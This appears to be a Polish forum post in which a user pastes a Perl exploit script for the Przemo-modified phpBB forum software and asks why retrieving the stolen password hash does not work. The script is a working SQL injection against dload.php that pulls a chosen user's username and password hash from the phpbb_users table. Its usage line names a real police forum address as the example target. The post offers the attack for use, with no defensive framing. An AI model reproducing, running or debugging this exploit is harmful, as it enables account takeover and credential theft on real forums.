Mam exploita na php by przemo
Moje pytanie brzmi: skąd wziąć to zhaszowane hasło bo ten sposób nie działa:
Kod:
#!/usr/bin/perl
#Exploit for phpbb modified by przemo
#Coded by:krasza[[email protected]]
#www:[url]http://www.krasza.int.pl[/url]
use strict;
use warnings;
use LWP::UserAgent;
if(!$ARGV[0]){
print<<EOF;
perl explo.pl [url] [id_plik]
[url]-adres do servera wraz z katalogiem do forum;]
[id_user]-ID usera, którego ma zostac dodany login i hash
Przykład:
perl explo.pl [url]http://www.policja.gov.pl/forum[/url] krasza 2
EOF
exit;
}
my $url=shift;
my $id;
if(!$ARGV[1]){
$id=1;
}else{
$id=shift;
}
my ($nowa_tresc,$dload,$zadanie);
$dload=$url."/dload.php";
my $ua = new LWP::UserAgent;
$ua->agent("Firefox 1.5" . $ua->agent);
print "[+]Łączę się z ",$url,"...n";
$zadanie = new HTTP::Request POST => $dload;
$zadanie->content_type('application/x-www-form-urlencoded');
$zadanie->content('subject=Bardzo+dobry+program%27%2C1158418260%2C%273712b478d0%27%2C2%29%2C%281%2C%28SELECT+CONCAT%28username%2C%27%3A%27%2Cuser_password%29+FROM+%60phpbb_users%60+WHERE+user_id%3D'.$id.'%29%2C%27Rewelacyjny+progs%27%2C1158418260%2C%273712b478d0%27%2C2%29%2F*&addbbcode18=&addbbcode20=12&helpbox=Rada%3A+Style+mog%B1+by%E6+stosowane+szybko+do+zaznaczonego+tekstu&message=Bardzo+dobry+program%2C+chociaz+po+jego+zainstalowaniu+nie+dziala+mi+prawidlowo+przegladarka+i+do+kaz
dego+wpisu+dodaja+mi+sie+jakies+cyfry+i+litery%3A%2F&action=file&id='.$id.'&comment=post&submit=Wy%B6lij');
my $wynik2 = $ua->request($zadanie);
if ($wynik2->is_success){
print "[+]Login i hasło admina zostalo dodane;]n";
print "[+]Haslo:".$dload."?action=file&id=1n";
}else{
print "[-]Proba nie udanan";
}
Moje pytanie brzmi: skąd wziąć to zhaszowane hasło bo ten sposób nie działa:
Kod:
adresforum/dload.php?action=file&id=2